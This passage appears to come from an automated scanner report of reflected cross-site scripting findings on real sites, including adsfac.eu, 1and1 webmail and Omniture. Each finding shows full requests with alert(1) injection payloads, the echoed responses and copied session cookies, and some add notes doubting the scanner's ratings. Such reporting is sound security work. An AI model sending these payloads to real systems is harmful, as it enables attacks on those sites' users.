The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82846'%3balert(1)//bc7259a2a3e was submitted in the clk parameter. This input was echoed as 82846';alert(1)//bc7259a2a3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.asp?cc=VWA084.117885.0&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk=82846'%3balert(1)//bc7259a2a3e HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 729
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSVWA084117885=uid=7016340; expires=Mon, 17-Oct-2011 00:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:30 GMT
Connection: close

<html><body>
<script type="text/javascript">
if (typeof(fd_clk) == 'undefined') {var fd_clk = '82846';alert(1)//bc7259a2a3ehttp://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706';};
var fd_imp='http://cdn.adsfac.eu/ads/VWA084/144706.0.0.swf';
var fd_bak='http://adsfac.eu/creative.asp?CreativeID=144706';
var fd_b
...[SNIP]...

2.3. http://adsfac.eu/ag.asp [clk parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc72"><script>alert(1)</script>f885aaf88a2 was submitted in the clk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=VWA084.117885.0&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk=4dc72"><script>alert(1)</script>f885aaf88a2 HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 759
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:29 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSVWA084117885=uid=7015916; expires=Mon, 17-Oct-2011 00:23:28 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:28 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:28 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:29 GMT
Connection: close

<html><body>
<script type="text/javascript">
if (typeof(fd_clk) == 'undefined') {var fd_clk = '4dc72"><script>alert(1)</script>f885aaf88a2http://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=1447
...[SNIP]...
<a target="_blank" href="4dc72"><script>alert(1)</script>f885aaf88a2http://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706">
...[SNIP]...

2.4. https://mailxchange.1and1.com/ajax/login [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://mailxchange.1and1.com
Path:   /ajax/login

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c33b9<script>alert(1)</script>6afa09c7826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/c33b9<script>alert(1)</script>6afa09c7826?action=autologin&modules=true&client=com.openexchange.ox.gui.dhtml&version=6.20.0%20Rev24 HTTP/1.1
Host: mailxchange.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://mailxchange.1and1.com/ox6/ox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:6:ChbXhwAAATPAbdpOyIFYlU2M8_MKRXjX:1318724228999; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 404 Not Found
Date: Sun, 16 Oct 2011 00:18:43 GMT
Server: Apache/2.2.9
X-JK-ID: 1318716007-31889-5284
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92

<html>No servlet bound to path/alias: /ajax/c33b9<script>alert(1)</script>6afa09c7826</html>

2.5. https://mailxchange.1and1.com/ajax/login [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://mailxchange.1and1.com
Path:   /ajax/login

Issue detail

The value of the action request parameter is copied into the application's response. The payload e350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e was submitted in the action parameter. This input was echoed as e350b<img src=a onerror=alert(1)>6cc434dab0e in the application's response.

This proof-of-concept shows the markup is reflected without encoding. Note the context, though: the response is served with Content-Type: text/javascript and the echoed value sits inside a JSON string in the error_params array, not between HTML tags as the scanner's classification states. The <img> tag is inert inside that string; it becomes script execution only if a client inserts the error text into the DOM without encoding it. Confirm how the client handles error_params before accepting the High/Certain rating.

Request

GET /ajax/login?action=autologine350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e&modules=true&client=com.openexchange.ox.gui.dhtml&version=6.20.0%20Rev24 HTTP/1.1
Host: mailxchange.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://mailxchange.1and1.com/ox6/ox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:6:ChbXhwAAATPAbdpOyIFYlU2M8_MKRXjX:1318724228999; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 200 OK
Date: Sun, 16 Oct 2011 00:18:38 GMT
Server: Apache/2.2.9
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Content-Length: 171

{"category":8,"error_params":["autologine350b<img src=a onerror=alert(1)>6cc434dab0e"],"error":"Unknown AJAX action: %s.","error_id":"1874720427-167926","code":"SVL-0001"}

2.6. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the application's response. The payload 8ec62<script>alert(1)</script>4b069b5a65f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

The reflection is real, but the context is not HTML text between tags as classified: the response is text/javascript and the value lands inside a single-quoted JavaScript string literal passed to mboxFactories.get('default').get(). A <script> tag inside that literal does not execute when the response is consumed as script. What decides exploitability in this context is whether a single quote or backslash in the mbox value is escaped, and this evidence does not show that; treat the High/Certain rating as unconfirmed until it is tested.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=4&mbox=newhome_offer8ec62<script>alert(1)</script>4b069b5a65f&mboxId=0&mboxTime=1318708708770&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:07 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 306
Date: Sun, 16 Oct 2011 00:59:06 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offer8ec62<script>alert(1)</script>4b069b5a65f',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getCookieManager().setCookie("session","1318726761577-292972",1860);mboxFactories.get('default').getPCId().forceId("131862767
...[SNIP]...

2.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the application's response. The payload 71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d was submitted in the mbox parameter. This input was echoed as 71a79<img src=a onerror=alert(1)>9cea6436f9d in the application's response.

This proof-of-concept uses an event handler payload, but as in 2.6 the value is reflected into a single-quoted JavaScript string literal in a text/javascript response, not into HTML text. An <img> tag with an onerror handler is inert inside a JavaScript string. The same caveat applies: the context is controlled by quote and backslash handling, which this request does not exercise.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d&mboxId=0&mboxTime=1318708721314&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&eVar17=6%3A30PM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 01:00:17 GMT; Path=/m2/omnituremarketing
Content-Length: 264
Date: Sun, 16 Oct 2011 01:00:16 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318627675715-101685.19");mboxFactories.get('default').get('SiteCatalyst: event71a79<img src=a onerror=alert(1)>9cea6436f9d', 0).setOffer(new mboxOfferDefault()).loaded();}

2.8. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the application's response. The payload e3302<script>alert(1)</script>df23f11db5e was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

Here the value is emitted as the bare second argument of .get('SiteCatalyst: event', ...), that is, directly in JavaScript code rather than in a string literal or in HTML. HTML markup in that position is a syntax error, not an exploit, so the proof-of-concept payload does not demonstrate execution. The real exposure is that arbitrary JavaScript tokens are accepted where an integer is expected; the fix is to validate mboxId as an integer before emitting it, not to HTML-encode it.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0e3302<script>alert(1)</script>df23f11db5e&mboxTime=1318708721314&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&eVar17=6%3A30PM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 01:00:19 GMT; Path=/m2/omnituremarketing
Content-Length: 261
Date: Sun, 16 Oct 2011 01:00:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318627675715-101685.19");mboxFactories.get('default').get('SiteCatalyst: event', 0e3302<script>alert(1)</script>df23f11db5e).setOffer(new mboxOfferDefault()).loaded();}

2.9. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6b48c<script>alert(1)</script>d37c751e8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726709893-408414&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318726709893-408414&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging6b48c<script>alert(1)</script>d37c751e8df&mboxId=0&mboxTime=1318708710034&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627688287-996814.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:06 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 314
Date: Sun, 16 Oct 2011 00:59:06 GMT
Server: Test & Target

mboxFactories.get('staging').get('newhome_offer-staging6b48c<script>alert(1)</script>d37c751e8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('staging').getCookieManager().setCookie("session","1318726768507-362610",1860);mboxFactories.get('staging').getPCId().forceId("131862768
...[SNIP]...

2.10. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140f'%3balert(1)//810eef61a7b was submitted in the mboxFactoryId parameter. This input was echoed as 5140f';alert(1)//810eef61a7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726709893-408414&mboxFactoryId=staging5140f'%3balert(1)//810eef61a7b&mboxPC=1318631787015-280970.19&mboxPage=1318726709893-408414&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318708710034&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:04 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1212
Date: Sun, 16 Oct 2011 00:59:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging5140f';alert(1)//810eef61a7b').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-staging5140f';alert(1)//810eef61a7b-newhome_o
...[SNIP]...

2.11. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /en/%0A%22%3E%3Ca%3Exsssss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67e3"><a>922b46dfc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; mbox=PC#1318631777052-118529.19#1319897885|session#1318686440062-338730#1318690145|check#true#1318688345; mbox-staging=PC#1318631787015-280970.19#1319897892|session#1318686446356-232585#1318690152|check#true#1318688352; s_sv_p1=1@26@s/7243/7019/7341/6423&e/19

Response

HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 00:58:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48025
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 04:58:07 GMT
Date: Sun, 16 Oct 2011 00:58:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Adobe Online Marketing Suite po
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f&ignore_skin=0" />
...[SNIP]...

2.12. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b34"><a>51370b9834b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

